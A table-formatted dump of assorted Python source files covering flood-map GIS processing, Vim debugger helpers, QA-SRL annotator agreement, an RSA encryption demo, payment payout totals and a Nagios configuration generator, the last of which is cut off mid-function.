id (stringlengths 1-265) | text (stringlengths 6-5.19M) | dataset_id (stringclasses, 7 values)
---|---|---|
1659355 | <filename>python/ef5_inundation.py
#
# Processes Flood Inundation Maps from EF5 http://flash.ou.edu/pakistan/
#
import os, sys
from datetime import date
from dateutil.parser import parse
import glob, fnmatch, urllib, math, shutil
from osgeo import gdal
import numpy
import argparse
import config
import json
from browseimage import MakeBrowseImage
from s3 import CopyToS3
from level import CreateLevel
force = 0
verbose = 0
BASE_DIR = config.EF5_DIR
def execute( cmd ):
if verbose:
print cmd
os.system(cmd)
def process(mydir, scene, s3_bucket, s3_folder):
fullName = os.path.join(mydir, scene+".tif")
if not os.path.exists(fullName):
print "File does not exist", fullName
sys.exit(-1)
# Flood inundation map for Namibia has too large an extent [10,-30,30,-10]
# we can trim it [15, -20, 20, -10]
subsetFileName = os.path.join(mydir, "%s_subset.tif" % scene)
if force or not os.path.exists(subsetFileName):
bbox = [15, -20, 20, -12]
warpOptions = "-q -overwrite -co COMPRESS=DEFLATE -t_srs EPSG:4326 -te %s %s %s %s " % (bbox[0], bbox[1], bbox[2], bbox[3])
warpCmd = 'gdalwarp ' + warpOptions + fullName + ' ' + subsetFileName
execute( warpCmd )
#sys.exit(-1)
geojsonDir = os.path.join(mydir,"geojson")
if not os.path.exists(geojsonDir):
os.makedirs(geojsonDir)
levelsDir = os.path.join(mydir,"levels")
if not os.path.exists(levelsDir):
os.makedirs(levelsDir)
merge_filename = os.path.join(geojsonDir, "ef5.%s.geojson" % scene)
topojson_filename = os.path.join(geojsonDir, "..", "ef5.%s.topojson" % scene)
browse_filename = os.path.join(geojsonDir, "..", "ef5.%s_browse.tif" % scene)
small_filename = os.path.join(geojsonDir, "..", "ef5.%s_small_browse.tif" % scene)
osm_bg_image = os.path.join(geojsonDir, "..", "osm_bg.png")
sw_osm_image = os.path.join(geojsonDir, "..", "ef5.%s_thn.jpg" % scene)
ds = gdal.Open( subsetFileName )
band = ds.GetRasterBand(1)
data = band.ReadAsArray(0, 0, ds.RasterXSize, ds.RasterYSize )
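# Inundation "height" level thresholds (descending) and a matching light-to-dark red palette used for the GeoJSON levels and browse image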
levels = [ 21, 13, 8, 5, 3, 2, 1]
hexColors = [ "#fee5d9", "#fcbba1", "#fc9272", "#fb6a4a", "#ef3b2c", "#cb181d", "#99000d"]
if force or not os.path.exists(topojson_filename+".gz"):
if verbose:
print "Processing", subsetFileName
for l in levels:
fileName = os.path.join(levelsDir, scene+"_level_%d.tif"%l)
CreateLevel(l, geojsonDir, fileName, ds, data, "height", force, verbose)
jsonDict = dict(type='FeatureCollection', features=[])
for l in reversed(levels):
fileName = os.path.join(geojsonDir, "height_level_%d.geojson"%l)
if os.path.exists(fileName):
print "merge", fileName
with open(fileName) as data_file:
data = json.load(data_file)
if 'features' in data:
for f in data['features']:
jsonDict['features'].append(f)
with open(merge_filename, 'w') as outfile:
json.dump(jsonDict, outfile)
# Convert to topojson
cmd = "topojson -p -o "+ topojson_filename + " " + merge_filename
execute(cmd)
cmd = "gzip --keep "+ topojson_filename
execute(cmd)
if force or not os.path.exists(sw_osm_image):
MakeBrowseImage(ds, browse_filename, subsetFileName, osm_bg_image, sw_osm_image, levels, hexColors, force, verbose, 6)
# we could remove geojsonDir and levelsDir
#cmd = "rm -rf %s %s" %(geojsonDir, levelsDir)
ds = None
file_list = [ sw_osm_image, topojson_filename, topojson_filename+".gz", fullName ]
CopyToS3( s3_bucket, s3_folder, file_list, force, verbose )
# ===============================
# Main
#
# python ef5_inundation.py --date 2015-02-03 -v -f
if __name__ == '__main__':
aws_access_key = os.environ.get('AWS_ACCESSKEYID')
aws_secret_access_key = os.environ.get('AWS_SECRETACCESSKEY')
parser = argparse.ArgumentParser(description='Generate EF5 flood map')
apg_input = parser.add_argument_group('Input')
apg_input.add_argument("-f", "--force", action='store_true', help="HydroSHEDS forces new water image to be generated")
apg_input.add_argument("-v", "--verbose", action='store_true', help="Verbose on/off")
apg_input.add_argument("-d", "--date", help="Date 2015-03-20 or today if not defined")
todaystr = date.today().strftime("%Y-%m-%d")
options = parser.parse_args()
dt = options.date or todaystr
force = options.force
verbose = options.verbose
today = parse(dt)
year = today.year
month = today.month
day = today.day
doy = today.strftime('%j')
ef5_dir = os.path.join(BASE_DIR,str(year),doy)
old_fileName = "%d%02d%02d.120000" % (year,month,day)
old_fullName = os.path.join(ef5_dir, old_fileName)
fileName = "%d%02d%02d" % (year,month,day)
fullName = os.path.join(ef5_dir, fileName)
shutil.copy2(old_fullName+".tif", fullName+".tif")
s3_folder = os.path.join("ef5", str(year), doy)
s3_bucket = 'ojo-d4' # Namibia
process(ef5_dir, fileName, s3_bucket, s3_folder)
| StarcoderdataPython |
3283925 | <filename>hypernode_monitoring/hn_config.py
"""
Bismuth
Configuration variables for HN monitoring script
"""
IP="127.0.0.1"
PORT="6969"
HN_PATH="/root/hypernode/modules"
HN_ADDRESS="your_hypernode_address_here_starts_with_a_B"
TIMEOUT_1=20
TIMEOUT_2=30
OUTFILE_1="/path/status.json"
OUTFILE_2="/path/hypernodes.json"
OUTFILE_3="/path/status_ex.json"
| StarcoderdataPython |
20121 | <filename>models/dl-weights.py
"""
This script downloads the weight file
"""
import requests
URL = "https://pjreddie.com/media/files/yolov3.weights"
r = requests.get(URL, allow_redirects=True)
open('yolov3_t.weights', 'wb').write(r.content)
| StarcoderdataPython |
3241370 | import numpy as np
import cv2
from mscoco import table
def get_classes(index):
obj = [v for k, v in table.mscoco2017.items()]
obj.sort(key=lambda x: x[0])  # sort in place; a bare sorted() call would discard its result
classes = [j for i, j in obj]
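# Fix the RNG seed so each class index always maps to the same random color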
np.random.seed(420)
colors = np.random.randint(0, 224, size=(len(classes), 3))
return classes[index], tuple(colors[index].tolist())
| StarcoderdataPython |
71582 | <reponame>mbarbon/vdebug<gh_stars>1-10
import vdebug.opts
import vdebug.log
import vim
import re
import os
import urllib
import time
class Keymapper:
"""Map and unmap key commands for the Vim user interface.
"""
exclude = ["run","set_breakpoint","eval_visual"]
def __init__(self):
self._reload_keys()
self.is_mapped = False
self.existing = []
def run_key(self):
return self.keymaps['run']
def close_key(self):
return self.keymaps['close']
def map(self):
if self.is_mapped:
return
self._store_old_map()
self._reload_keys()
for func in self.keymaps:
if func not in self.exclude:
key = self.keymaps[func]
map_cmd = "noremap %s%s :python debugger.%s()<cr>" %\
(self.leader,key,func)
vim.command(map_cmd)
self.is_mapped = True
def _reload_keys(self):
self.keymaps = vim.eval("g:vdebug_keymap")
self.leader = vim.eval("g:vdebug_leader_key")
def _store_old_map(self):
vim.command('let tempfile=tempname()')
tempfile = vim.eval("tempfile")
vim.command('mkexrc! %s' % (tempfile))
regex = re.compile(r'^([nvxsoilc]|)(nore)?map!?')
split_regex = re.compile(r'\s+')
keys = set(v for (k,v) in self.keymaps.items() if k not in self.exclude)
special = set(["<buffer>", "<silent>", "<special>", "<script>", "<expr>", "<unique>"])
for line in open(tempfile, 'r'):
if not regex.match(line):
continue
parts = split_regex.split(line)[1:]
for p in parts:
if p in special:
continue
elif p in keys:
vdebug.log.Log("Storing existing key mapping, '%s' " % line,
vdebug.log.Logger.DEBUG)
self.existing.append(line)
else:
break
os.remove(tempfile)
def unmap(self):
if self.is_mapped:
self.is_mapped = False
for func in self.keymaps:
key = self.keymaps[func]
if func not in self.exclude:
vim.command("unmap %s%s" %(self.leader,key))
for mapping in self.existing:
vdebug.log.Log("Remapping key with '%s' " % mapping,\
vdebug.log.Logger.DEBUG)
vim.command(mapping)
class FilePath:
is_win = False
"""Normalizes a file name and allows for remote and local path mapping.
"""
def __init__(self,filename):
if filename is None or \
len(filename) == 0:
raise FilePathError("Missing or invalid file name")
filename = urllib.unquote(filename)
if filename.startswith('file:'):
filename = filename[5:]
if filename.startswith('///'):
filename = filename[2:]
p = re.compile('^/?[a-zA-Z]:')
if p.match(filename):
self.is_win = True
if filename[0] == "/":
filename = filename[1:]
self.local = self._create_local(filename)
self.remote = self._create_remote(filename)
def _create_local(self,f):
"""Create the file name as a locally valid version.
Uses the "local_path" and "remote_path" options.
"""
ret = f
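# A drive-letter path such as "C:/..." has "/" at index 2 and needs backslashes to be a valid local Windows path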
if ret[2] == "/":
ret = ret.replace("/","\\")
if vdebug.opts.Options.isset('path_maps'):
for remote, local in vdebug.opts.Options.get('path_maps', dict).items():
if remote in ret:
vdebug.log.Log("Replacing remote path (%s) " % remote +\
"with local path (%s)" % local ,\
vdebug.log.Logger.DEBUG)
ret = ret.replace(remote,local)
break
return ret
def _create_remote(self,f):
"""Create the file name valid for the remote server.
Uses the "local_path" and "remote_path" options.
"""
ret = f
if vdebug.opts.Options.isset('path_maps'):
for remote, local in vdebug.opts.Options.get('path_maps', dict).items():
if local in ret:
vdebug.log.Log("Replacing local path (%s) " % local +\
"with remote path (%s)" % remote ,\
vdebug.log.Logger.DEBUG)
ret = ret.replace(local,remote)
break
if ret[2] == "\\":
ret = ret.replace("\\","/")
if self.is_win:
return "file:///"+ret
else:
return "file://"+ret
def as_local(self,quote = False):
if quote:
return urllib.quote(self.local)
else:
return self.local
def as_remote(self):
return self.remote
def __eq__(self,other):
if isinstance(other,FilePath):
if other.as_local() == self.as_local():
return True
return False
def __ne__(self,other):
if isinstance(other,FilePath):
if other.as_local() == self.as_local():
return False
return True
def __add__(self,other):
return self.as_local() + other
def __radd__(self,other):
return other + self.as_local()
def __str__(self):
return self.as_local()
def __repr__(self):
return str(self)
class LocalFilePath(FilePath):
def _create_local(self,f):
"""Create the file name as a locally valid version.
Uses the "local_path" and "remote_path" options.
"""
return f
class RemoteFilePath(FilePath):
def _create_remote(self,f):
"""Create the file name valid for the remote server.
Uses the "local_path" and "remote_path" options.
"""
return f
class FilePathError(Exception):
pass
class InputStream:
"""Get a character from Vim's input stream.
Used to check for keyboard interrupts."""
def probe(self):
try:
vim.eval("getchar(0)")
time.sleep(0.1)
except: # vim.error
raise UserInterrupt()
class UserInterrupt(Exception):
"""Raised when a user interrupts connection wait."""
| StarcoderdataPython |
1745363 | from argparse import ArgumentParser
from typing import List, Dict
import pandas as pd
import numpy as np
import os
from glob import glob
from itertools import combinations, product
from common import Role, Argument
from evaluate import Metrics, joint_len, iou
from evaluate_dataset import eval_datasets, yield_paired_predicates
from decode_encode_answers import decode_qasrl
def is_argument_match(arguments1: List[Argument], arguments2: List[Argument]):
for arg1, arg2 in product(arguments1, arguments2):
if iou(arg1, arg2) >= 0.3:
return True
return False
def evaluate_agreement(roles1: List[Role], roles2: List[Role]) -> int:
used_roles1 = set()
used_roles2 = set()
n_matches = 0
for role1, role2 in product(roles1, roles2):
# if role1 in used_roles1 or role2 in used_roles2:
# continue
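# Normalize wh-words: "who" and "what" are treated as interchangeable when comparing questions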
q1 = role1.question.wh.lower()
q2 = role2.question.wh.lower()
q1 = 'whowhat' if q1 in ('who', 'what') else q1
q2 = 'whowhat' if q2 in ('who', 'what') else q2
is_wh_match = q1 == q2
if is_argument_match(role1.arguments, role2.arguments):
if not is_wh_match:
print(role1.question.text, role2.question.text)
if is_wh_match and is_argument_match(role1.arguments, role2.arguments):
n_matches += 1
used_roles1.add(role1)
used_roles2.add(role2)
return n_matches
def eval_datasets_for_agreement(df1, df2):
n_matches = 0
n_total_roles = 0
for key, roles1, roles2 in yield_paired_predicates(df1, df2):
local_n_matches = evaluate_agreement(roles1, roles2)
n_matches += local_n_matches
n_total_roles += len(roles1) + len(roles2) - local_n_matches
return n_matches, n_total_roles
def evaluate_generator_agreement(annot_df: pd.DataFrame, sent_map: Dict[str, List[str]]):
cols = ['qasrl_id', 'verb_idx']
n_gen = annot_df.groupby(cols).worker_id.transform(pd.Series.nunique)
workers = annot_df.worker_id.unique().tolist()
n_workers = len(workers)
annot_df = annot_df[n_gen == n_workers].copy()
n_predicates = annot_df[cols].drop_duplicates().shape[0]
print("n_workers: ", n_workers)
print("n_predicates: ", n_predicates)
print(f"worker_1\tworker_2\tprec\trecall\tf1")
f1s, label_f1s = [], []
uniq_roles_per_predicate = []
agreed_roles_per_predicate = []
for w1, w2 in combinations(workers, r=2):
w1_df = annot_df[annot_df.worker_id == w1].copy()
w2_df = annot_df[annot_df.worker_id == w2].copy()
# n_matches, n_total = eval_datasets_for_agreement(w1_df, w2_df)
# uniq_roles_per_predicate.append(float(n_total)/n_predicates)
# agreed_roles_per_predicate.append(float(n_matches)/n_predicates)
#
#
arg_metrics, label_arg_metrics, _ = eval_datasets(w1_df, w2_df)
print(f"{w1}\t{w2}\t{arg_metrics.prec()}\t{arg_metrics.recall()}\t{arg_metrics.f1()}")
print(f"{w1}\t{w2}\t{label_arg_metrics.prec()}\t{label_arg_metrics.recall()}\t{label_arg_metrics.f1()}")
f1s.append(arg_metrics.f1())
label_f1s.append(label_arg_metrics.f1())
f1s = np.array(f1s)
label_f1s = np.array(label_f1s)
print(f1s.mean(), f1s.std())
print(label_f1s.mean(), label_f1s.std())
# agreed_roles_per_predicate = np.array(agreed_roles_per_predicate)
# print(agreed_roles_per_predicate.mean(), agreed_roles_per_predicate.std())
#
# uniq_roles_per_predicate = np.array(uniq_roles_per_predicate)
# print(uniq_roles_per_predicate.mean(), uniq_roles_per_predicate.std())
def read_csv(file_path: str):
try:
return pd.read_csv(file_path)
except UnicodeDecodeError:
return pd.read_csv(file_path, encoding="Latin-1")
def dataset_path(root_dir: str, dataset_name: str,
gen1: str, gen2: str, arb: str):
slice_path = "_".join([gen1, gen2, arb])
slice_path = f"{dataset_name}.inter.{slice_path}.csv"
slice_path = os.path.join(root_dir, slice_path)
return slice_path
def main(root_dir: str, dataset_name: str):
readme = pd.read_csv(os.path.join(root_dir, 'readme.csv'))
sent_path = os.path.join(root_dir, f'{dataset_name}.csv')
sent_df = read_csv(sent_path)
sent_map = dict(zip(sent_df.qasrl_id, sent_df.tokens.apply(str.split)))
# original annotations, multiple generation tasks per predicate
annot_df = read_csv(os.path.join(root_dir, f'{dataset_name}.annot.csv'))
annot_df = decode_qasrl(annot_df)
print(annot_df.worker_id.value_counts())
evaluate_generator_agreement(annot_df, sent_map)
slice_pairs = []
for arbitrators_, generators_ in zip(readme.arbitrators, readme.generators):
arb1, arb2 = arbitrators_.split()
gen1, gen2, gen3, gen4 = generators_.split()
slice1_path = dataset_path(root_dir, dataset_name, gen1, gen2, arb1)
slice2_path = dataset_path(root_dir, dataset_name, gen3, gen4, arb2)
slice1 = decode_qasrl(pd.read_csv(slice1_path))
slice2 = decode_qasrl(pd.read_csv(slice2_path))
# make sure they have the same predicates...
s1 = set(zip(slice1.qasrl_id, slice1.verb_idx))
s2 = set(zip(slice2.qasrl_id, slice2.verb_idx))
print(len(s1), len(s2))
unlabelled_arg, labeled_arg, unlabelled_role = eval_datasets(slice1, slice2)
print(unlabelled_arg)
print(labeled_arg)
print(unlabelled_role)
if __name__ == "__main__":
ap = ArgumentParser()
ap.add_argument("inter_annotator_dir")
ap.add_argument("dataset_name")
args = ap.parse_args()
main(args.inter_annotator_dir, args.dataset_name)
| StarcoderdataPython |
3317585 | <reponame>Alex014/CryptoContainer
from classes.CryptorRSA import CryptorRSA
import base64
import rsa
cryptor = CryptorRSA(rsa_bits=512, blowfish_bits=256)
(pubkey, privkey) = cryptor.generate()
print("\n *** Public key: \n" + pubkey.decode('utf-8'))
print("\n *** Private key: \n" + privkey.decode('utf-8'))
msg = "Pure Python RSA implementationPyPI Build Status Coverage Status Code Climate\n" \
"Python-RSA is a pure-Python RSA implementation. It supports encryption and decryption, signing and verifying signatures, and key generation according to PKCS#1 version 1.5. It can be used as a Python library as well as on the commandline. The code was mostly written by <NAME>.\n" \
"Documentation can be found at the Python-RSA homepage. For all changes, check the changelog."
print("\n *** Original message: \n" + msg)
encryption = cryptor.encrypt(msg, pubkey)
ciphertext = encryption[0]
bkey = encryption[1]
ciphertext = base64.b64encode(ciphertext)
bkey = base64.b64encode(bkey)
ciphertext = base64.b64decode(ciphertext)
bkey = base64.b64decode(bkey)
msg = cryptor.decrypt(ciphertext, bkey, privkey)
print("\n *** Decrypted message: \n" + msg)
# *******************************************
sig = cryptor.sign(msg, privkey)
sig = base64.b64encode(sig)
print("\n *** Message signature: " + sig.decode('utf-8'))
sig = base64.b64decode(sig)
verify = cryptor.verify(msg, pubkey, sig)
print("\n *** Verification result: ")
print(verify) | StarcoderdataPython |
1622837 | name = ''
while True:
print('Please type your name.')
name = input()
# if name equals 'your name', break out of the loop
if name == 'your name':
break
print('Thank you!')
| StarcoderdataPython |
1702327 | from utils import *
from pprint import pprint as pp
import requests, json, sys, decimal
from datetime import datetime, timedelta
#organizations/self/accounts/LIQUID/transactions\?start=2020-08-01T00:00:00\&end=2020-08-14T00:00:00\&includeTransactionType=PAYOUT
if len(sys.argv) != 2:
sys.stderr.write('Usage: %s <days>\n' % sys.argv[0])
sys.exit(1)
access_token = get_access_token()
offset = int(sys.argv[1])
start_date = (datetime.now() - timedelta(days = offset)).strftime('%Y-%m-%dT%H:%M:%S')
end_date = datetime.now().strftime('%Y-%m-%dT%H:%M:%S')
method = 'get'
server = 'finance'
path = 'organizations/self/accounts/LIQUID/transactions'
url = 'https://%s.izettle.com/%s' % (server, path)
res = getattr(requests, method)(url,
headers = {'Authorization': 'Bearer %s' % access_token},
params = {'start': start_date,
'end': end_date,
'includeTransactionType': 'PAYOUT'})
data = json.loads(res.text)
full_amount = decimal.Decimal(0)
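# Amounts appear to be reported in cents and negative for payouts, hence the sign flip and division by 100 below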
for payout in data['data']:
amount = decimal.Decimal(payout['amount']) * -1 / 100
full_amount += amount
print(payout['timestamp'], amount)
print("SUM:", full_amount)
| StarcoderdataPython |
4817207 | from __future__ import print_function
import logging
import backoff
from throttle import throttle
from config import __packagename__
class Resiliently(object):
def __init__(self, config):
self._config = config
if config.verbose:
logging.getLogger('backoff').addHandler(logging.StreamHandler())
def call(self, func, *args, **kwargs):
return self._throttle(self._retry, func, *args, **kwargs)
def _throttle(self, func, *args, **kwargs):
return throttle(delay_sec=self._config.throttling)(func)(*args, **kwargs)
def _retry(self, func, *args, **kwargs):
# We +1 this because backoff retries UP to and not including max_retries
max_tries = self._config.retry + 1
return backoff.on_exception(backoff.expo, Exception, max_tries=max_tries)(func)(*args, **kwargs)
| StarcoderdataPython |
1775431 | #!/usr/bin/python2.7
"""
Copyright (c) 2014, ICFLIX Media FZ LLC All rights reserved.
Use of this source code is governed by a BSD-style license that can be
found in the LICENSE file.
Desc: Generate Nagios configuration from given file, resp. from check_multi.
"""
import logging
import logging.handlers
import json
import os.path
import re
import sys
import yaml
from nagios_to_yaml import NagiosToYaml
ICINGA_DIR = '/etc/icinga'
LOG_FORMAT = '%(asctime)s %(levelname)-10s %(message)s'
MACHINEDB_FILE = '/etc/icinga/machines.json'
NAGIOS_DEFS_FILE = '/etc/icinga/nagios.yml'
NAGIOS_TKEYS = [
'commands',
'contacts',
'contactgroups',
'datacenters',
'hostgroups',
'hosts',
'services'
]
STAGING_DOMAIN = 'icflix.io'
# 7 minutes
SVC_FRESHNESS_THRESHOLD = 420
# Make sure Nagios knows all Hosts in MachineDB
# -> <FQDN>.cfg must exist for each and every Host in MDB
# Re-Generate hostgroups
# Re-Generate contacts
# Re-Generate contactsgroups
# Re-Generate commands
class NagiosConfigGenerator(object):
"""Generate Nagios Configuration for *ONE* Host from given file."""
def __init__(self):
self.machine_db = None
self.nagios_db = None
self.load_machine_db()
self.load_nagios_definitions()
self.mdb_to_nagios()
def add_datacenter_to_nagios(self, dct_dict):
"""Add given Datacenter to Nagios. If given Datacenter is already
known, merge in attributes/values, but don't over-ride Nagios ones.
"""
nagios_dcs = self.nagios_db['datacenters']
dct_name = dct_dict.pop('host_name')
if dct_name not in nagios_dcs:
nagios_dcs[dct_name] = {}
nagios_dct = nagios_dcs[dct_name]
if 'hostgroups' not in nagios_dct:
nagios_dct['hostgroups'] = list()
nagios_dct['hostgroups'].append('datacenter')
if 'host' not in nagios_dct:
nagios_dct['host'] = {}
for attr in dct_dict.iterkeys():
if attr in nagios_dct['host']:
# Don't over-ride Nagios definitions
continue
nagios_dct['host'][attr] = dct_dict[attr]
def add_host_to_nagios(self, host_dict, is_lxc):
"""Add given Host to Nagios. If given Host is already known, merge in
values, but don't over-ride Nagios ones.
"""
nagios_hosts = self.nagios_db['hosts']
hostname = host_dict.pop('host_name')
if hostname not in nagios_hosts:
nagios_hosts[hostname] = {}
nagios_host = nagios_hosts[hostname]
if 'hostgroups' not in nagios_host:
nagios_host['hostgroups'] = list()
auto_hostgroup = self.get_auto_hostgroup(hostname)
nagios_host['hostgroups'].append(auto_hostgroup)
if is_lxc:
nagios_host['hostgroups'].append('lxc')
if ('_DOMAIN' in host_dict
and host_dict['_DOMAIN'] == STAGING_DOMAIN):
nagios_host['hostgroups'].append('stage')
if 'host' not in nagios_host:
nagios_host['host'] = {}
for attr in host_dict.iterkeys():
if attr in nagios_host['host']:
# Don't over-ride Nagios definitions
continue
nagios_host['host'][attr] = host_dict[attr]
def add_services_to_host(self, nagios_host, ext_svcs):
"""Add (external) service definition to Nagios."""
if 'services' not in nagios_host:
nagios_host['services'] = {}
nagios_svcs = nagios_host['services']
for svc_key in ext_svcs['services'].iterkeys():
if svc_key not in nagios_svcs:
nagios_svcs[svc_key] = {}
nagios_svc = nagios_svcs[svc_key]
for attr in ext_svcs['services'][svc_key].iterkeys():
if attr in nagios_svc:
continue
nagios_svc[attr] = ext_svcs['services'][svc_key][attr]
def ensure_host_definitions(self):
"""Ensure Nagios knows all Hosts defined in MDB. This is required in
order to re-generate Hostgroups, because it could easilly happen Nagios
wouldn't know Host(s) in hostgroups.
"""
for host_key in self.nagios_db['hosts'].iterkeys():
host_dict = self.nagios_db['hosts'][host_key]
host_dict['host']['host_name'] = host_key
self.ensure_host_definition(host_dict)
def ensure_host_definition(self, host_dict):
"""Ensure file with Host definition exists."""
if host_dict is None:
return (-1)
host_file = ('%s/objects/host_%s.cfg' %
(ICINGA_DIR, host_dict['host']['host_name']))
if os.path.exists(host_file):
#logging.debug("File '%s' exists.", host_file)
return 1
fhandle = open(host_file, 'w+')
self.write_definition(fhandle, 'host', host_dict['host'])
if 'services' not in host_dict:
host_dict['services'] = {}
dummy_svc = dict()
dummy_svc['active_checks_enabled'] = 1
dummy_svc['check_command'] = 'return-ok'
dummy_svc['check_interval'] = 20
dummy_svc['host_name'] = host_dict['host']['host_name']
dummy_svc['use'] = 'generic-service'
host_dict['services']['dummy-ok'] = dummy_svc
for service_key in host_dict['services'].iterkeys():
service_copy = host_dict['services'][service_key]
service_copy['service_description'] = service_key
self.write_definition(fhandle, 'service',
service_copy)
del service_copy
fhandle.close()
return 0
def finish_host_definition(self, host_dict, hostname):
"""Add/over-ride attributes in Host definition."""
if hostname not in self.nagios_db['hosts']:
return
if 'host' not in self.nagios_db['hosts'][hostname]:
return
for attr in self.nagios_db['hosts'][hostname]['host'].iterkeys():
host_dict[attr] = self.nagios_db['hosts'][hostname]['host'][attr]
def get_auto_hostgroup(self, hostname):
"""Determine automatic Nagios hostgroup."""
auto_hostgroup = hostname.split('.')[0]
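# Strip trailing digits (or digit+letter suffixes) so hosts like "web01" and "web02" fall into one "web" hostgroup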
auto_hostgroup = re.sub(r'(\d+$|\d+[a-z]+)$', r'', auto_hostgroup)
return auto_hostgroup
def get_host_dict(self, hostname, machine_ip, ssh_port, parents):
"""Create Nagios 'host' as a dictionary from given params.
Parents is expected to be either None or a list.
"""
host_dict = {}
host_dict['use'] = 'generic-host'
host_dict['host_name'] = hostname
host_dict['address'] = machine_ip
if parents is not None:
host_dict['parents'] = ','.join(parents)
if ssh_port is not None:
host_dict['_SSH_PORT'] = ssh_port
splitted = hostname.split('.')
host_dict['_SHORTNAME'] = '.'.join(splitted[:len(splitted)-2])
host_dict['_DOMAIN'] = '.'.join(splitted[len(splitted)-2:])
return host_dict
def get_padding(self, padding_len):
"""Return padding :)"""
padding = ''
while padding_len > 0:
padding += ' '
padding_len -= 1
return padding
def get_ssh_port(self, machine_obj, is_lxc):
"""Determine SSH port for given Machine."""
ssh_port = 22
if is_lxc == False:
return ssh_port
if 'ports' not in machine_obj:
# Ehm, this is a bit inconclusive, isn't it?
return ssh_port
for port_cfg in machine_obj['ports']:
# dict is expected here
if 'private_port' not in port_cfg:
continue
if int(port_cfg['private_port']) == 22:
ssh_port = int(port_cfg['public_port'])
return ssh_port
def load_machine_db(self):
"""Just loads machine DB from JSON."""
with open(MACHINEDB_FILE, 'r') as fhandle:
self.machine_db = json.load(fhandle)['machines']
def load_nagios_definitions(self):
"""Load Nagios definitions from YAML."""
with open(NAGIOS_DEFS_FILE, 'r') as fhandle:
self.nagios_db = yaml.load(fhandle)
# Make nagios_db sane
for top_key in NAGIOS_TKEYS:
if top_key in self.nagios_db:
continue
self.nagios_db[top_key] = {}
if 'passive' not in self.nagios_db['services']:
self.nagios_db['services']['passive'] = {}
if 'active' not in self.nagios_db['services']:
self.nagios_db['services']['active'] = {}
def import_config(self, services_cfg):
"""Import configuration file (sent) from remote Host."""
if not os.path.exists(services_cfg):
logging.error("Given file '%s' doesn't exist.", services_cfg)
return False
hostname = os.path.basename(services_cfg).replace('.cfg', '')
if hostname == '':
logging.error('I have empty hostname! :-(')
return False
nagios_host = None
for host_key in self.nagios_db['hosts'].iterkeys():
if hostname == host_key:
nagios_host = self.nagios_db['hosts'][host_key]
break
if nagios_host is None:
logging.error('Machine %s not found in Nagios/MDB.', hostname)
return False
logging.info('FQDN: %s', hostname)
logging.info('IP: %s', nagios_host['host']['address'])
logging.info('SSH: %s', nagios_host['host']['_SSH_PORT'])
logging.info('Hostgroups: %s', nagios_host['hostgroups'])
nag2yaml = NagiosToYaml()
nag2yaml.parse_nagios_config(services_cfg)
ext_services = nag2yaml.nagios_cfg
for extsvc_key in ext_services['services'].iterkeys():
ext_service = ext_services['services'][extsvc_key]
if 'stage' in nagios_host['hostgroups']:
ext_service['use'] = 'stage-service'
else:
ext_service['use'] = 'generic-service'
ext_service['check_freshness'] = 1
ext_service['active_checks_enabled'] = 0
ext_service['passive_checks_enabled'] = 1
ext_service['freshness_threshold'] = SVC_FRESHNESS_THRESHOLD
ext_service['check_command'] = 'check_dummy_4p!2 "check is stale"'
if extsvc_key not in self.nagios_db['services']['passive']:
continue
# Over-ride attributes from ['services']['passive']
svc_nagios = self.nagios_db['services']['passive'][extsvc_key]
for attr in svc_nagios.iterkeys():
ext_service[attr] = svc_nagios[attr]
self.add_services_to_host(nagios_host, ext_services)
host_file = '%s/objects/host_%s.cfg' % (ICINGA_DIR, hostname)
with open(host_file, 'w+') as fhandle:
host_copy = nagios_host['host'].copy()
host_copy['host_name'] = hostname
self.write_definition(fhandle, 'host', host_copy)
for svc_key in nagios_host['services'].iterkeys():
service_copy = nagios_host['services'][svc_key].copy()
service_copy['service_description'] = svc_key
self.write_definition(fhandle, 'service', service_copy)
return True
def mdb_to_nagios(self):
"""Sync Nagios YAML with MDB."""
for host_key in self.machine_db.iterkeys():
hostname = '%s.icflix.com' % (host_key)
mdb_host = self.machine_db[host_key]
if 'datacenter' in mdb_host and 'provider' in mdb_host:
dct_name = '%s.%s' % (mdb_host['datacenter'],
mdb_host['provider'])
dct_dict = self.get_host_dict(dct_name, 'localhost', None, None)
dct_dict['use'] = 'generic-datacenter'
dct_dict.pop('_SHORTNAME')
dct_dict.pop('_DOMAIN')
self.add_datacenter_to_nagios(dct_dict)
parents = [dct_name]
else:
parents = None
host_dict = self.get_host_dict(hostname, mdb_host['ip'], 22,
parents)
self.add_host_to_nagios(host_dict, False)
if 'lxc' not in mdb_host:
continue
for lxc_key in mdb_host['lxc'].iterkeys():
ssh_port = self.get_ssh_port(mdb_host['lxc'][lxc_key], True)
lxc_dict = self.get_host_dict(lxc_key, mdb_host['ip'],
ssh_port, [hostname])
self.add_host_to_nagios(lxc_dict, True)
def print_definition(self, definition_str, some_dict):
"""Print host definition."""
stuffing_len = 0
dict_keys = some_dict.keys()
dict_keys.sort()
# figure-out padding len
for attribute in dict_keys:
if len(attribute) > stuffing_len:
stuffing_len = len(attribute)
stuffing_len += 1
print 'define %s {' % (definition_str)
for attribute in dict_keys:
padding_len = stuffing_len - len(attribute)
padding = self.get_padding(padding_len)
print ' %s%s%s' % (attribute, padding, some_dict[attribute])
print '}\n'
def run(self, services_cfg):
""" Go, go, go!"""
if not self.import_config(services_cfg):
return False
self.ensure_host_definitions()
self.write_command_definitions()
self.write_contact_definitions()
self.write_contactgroup_definitions()
self.write_datacenter_definitions()
self.write_hostgroup_definitions()
self.write_service_definitions()
return True
def write_command_definitions(self):
"""Write definitions of all commands."""
if 'commands' not in self.nagios_db:
return
commands_file = '%s/objects/commands.cfg' % (ICINGA_DIR)
fhandle = open(commands_file, 'w+')
i = 0
for command in self.nagios_db['commands'].iterkeys():
cmd_dict = self.nagios_db['commands'][command]
cmd_dict['command_name'] = command
self.write_definition(fhandle, 'command', cmd_dict)
i += 1
fhandle.close()
logging.info("Written %i 'command' definitions.", i)
def write_contact_definitions(self):
"""Write definitions of all contacts."""
if 'contacts' not in self.nagios_db:
return
contacts_file = '%s/objects/contacts.cfg' % (ICINGA_DIR)
fhandle = open(contacts_file, 'w+')
i = 0
for contact in self.nagios_db['contacts'].iterkeys():
contact_dict = self.nagios_db['contacts'][contact]
contact_dict['contact_name'] = contact
self.write_definition(fhandle, 'contact', contact_dict)
i += 1
fhandle.close()
logging.info("Written %i 'contact' definitions.", i)
def write_contactgroup_definitions(self):
"""Write definitions of all contactgroups."""
cgroups_file = '%s/objects/contactgroups.cfg' % (ICINGA_DIR)
cgroups = self.nagios_db['contactgroups']
fhandle = open(cgroups_file, 'w+')
i = 0
for cgroup_key in cgroups.iterkeys():
cgroup_dict = cgroups[cgroup_key]
